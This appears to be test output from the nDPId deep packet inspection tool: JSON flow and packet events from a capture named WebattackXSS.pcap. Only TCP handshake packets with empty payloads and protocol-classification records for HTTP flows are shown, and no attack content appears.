+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347962480,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347962480,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34520,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8250,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":1,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OwpAAD4GisasEAABwKgKMobYAFAZTIhjAAAAAKACchCBhgAAAgQFtAQCCAoBPLNpAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":2,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347962480,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhtjOuip1GUyIZKAScSAAcgAAAgQFtAQCCAoD5oTdATyzaQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":582,"flow_packet_id":3,"flow_last_seen":1499347962480,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347962480,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OwtAAD4Gis2sEAABwKgKMobYAFAZTIhkzroqdoAQAOWfeQAAAQEICgE8s2kD5oTd"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347963774,"flow_last_seen":1499347963774,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347963774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":1,"flow_last_seen":1499347963774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82g5AAD4G68GsEAABwKgKMobmAFBdLG6iAAAAAKACchBWFgAAAgQFtAQCCAoBPLSsAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8263,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":2,"flow_last_seen":1499347963774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347963774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhub+xS4sXSxuo6AScSCf\/AAAAgQFtAQCCAoD5oYgATy0rAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8264,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":583,"flow_packet_id":3,"flow_last_seen":1499347963775,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347963775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02g9AAD4G68isEAABwKgKMobmAFBdLG6j\/sUuLYAQAOU\/AwAAAQEICgE8tK0D5oYg"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347965133,"flow_last_seen":1499347965133,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347965133,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8274,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":1,"flow_last_seen":1499347965133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8KcdAAD4GnAmsEAABwKgKMob0AFDtE5\/HAAAAAKACchCTpwAAAgQFtAQCCAoBPLYAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8275,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":2,"flow_last_seen":1499347965133,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347965133,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhvTIVjMH7ROfyKAScSANzgAAAgQFtAQCCAoD5od0ATy2AAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8276,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":584,"flow_packet_id":3,"flow_last_seen":1499347965134,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347965134,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KchAAD4GnBCsEAABwKgKMob0AFDtE5\/IyFYzCIAQAOWs1QAAAQEICgE8tgAD5od0"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347966420,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347966420,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34562,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8283,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":1,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U6hAAD4GciisEAABwKgKMocCAFDUQeTqAAAAAKACchBmBgAAAgQFtAQCCAoBPLdCAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":2,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347966420,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhwJV63ns1EHk66AScSAKcQAAAgQFtAQCCAoD5oi2ATy3QgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8285,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":585,"flow_packet_id":3,"flow_last_seen":1499347966420,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347966420,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U6lAAD4Gci+sEAABwKgKMocCAFDUQeTrVet57YAQAOWpeAAAAQEICgE8t0ID5oi2"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347967724,"flow_last_seen":1499347967724,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":1,"flow_last_seen":1499347967724,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JnBAAD4Gn2CsEAABwKgKMocQAFDWSp74AAAAAKACchComwAAAgQFtAQCCAoBPLiIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":2,"flow_last_seen":1499347967725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347967725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhxDJR2HM1kqe+aAScSDwgwAAAgQFtAQCCAoD5on8ATy4iAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":586,"flow_packet_id":3,"flow_last_seen":1499347967725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347967725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JnFAAD4Gn2esEAABwKgKMocQAFDWSp75yUdhzYAQAOWPiwAAAQEICgE8uIgD5on8"} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347833462,"flow_last_seen":1499347838849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347836095,"flow_last_seen":1499347841850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347837373,"flow_last_seen":1499347842851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347838675,"flow_last_seen":1499347843851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347841229,"flow_last_seen":1499347846856,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8304,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347842491,"flow_last_seen":1499347847857,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347967888,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347970267,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347970267,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8316,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":1,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vvZAAD4GBtqsEAABwKgKMocqAFAxLQXyAAAAAKACchDkKQAAAgQFtAQCCAoBPLsEAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8317,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":2,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347970267,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhyoPJF9xMS0F86AScSDmFAAAAgQFtAQCCAoD5ox4ATy7BAEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8318,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":587,"flow_packet_id":3,"flow_last_seen":1499347970267,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347970267,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vvdAAD4GBuGsEAABwKgKMocqAFAxLQXzDyRfcoAQAOWFHAAAAQEICgE8uwQD5ox4"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347971560,"flow_last_seen":1499347971560,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347971560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34616,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8328,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1499347971560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XBJAAD4Gab6sEAABwKgKMoc4AFCpCuBVAAAAAKACchCQlwAAAgQFtAQCCAoBPLxHAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8330,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":2,"flow_last_seen":1499347971560,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347971560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhzgyg4heqQrgVqAScSBE8wAAAgQFtAQCCAoD5o27ATy8RwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":3,"flow_last_seen":1499347971561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347971561,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XBNAAD4GacWsEAABwKgKMoc4AFCpCuBWMoOIX4AQAOXj+gAAAQEICgE8vEcD5o27"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347974113,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347974113,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34642,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8349,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rk1AAD4GF4OsEAABwKgKModSAFAISxCIAAAAAKACchD+jAAAAgQFtAQCCAoBPL7FAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":2,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347974113,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh1LQi4qtCEsQiaAScSAQEwAAAgQFtAQCCAoD5pA5ATy+xQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":3,"flow_last_seen":1499347974113,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347974113,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rk5AAD4GF4qsEAABwKgKModSAFAISxCJ0IuKroAQAOWvGgAAAQEICgE8vsUD5pA5"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347975371,"flow_last_seen":1499347975371,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347975371,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34656,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8358,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1499347975371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l4BAAD4GLlCsEAABwKgKModgAFCggleAAAAAAKACchAeFAAAAgQFtAQCCAoBPMAAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8359,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":2,"flow_last_seen":1499347975371,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347975371,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQh2BVDgzaoIJXgaAScSAnsAAAAgQFtAQCCAoD5pF0ATzAAAEDAwc="} 
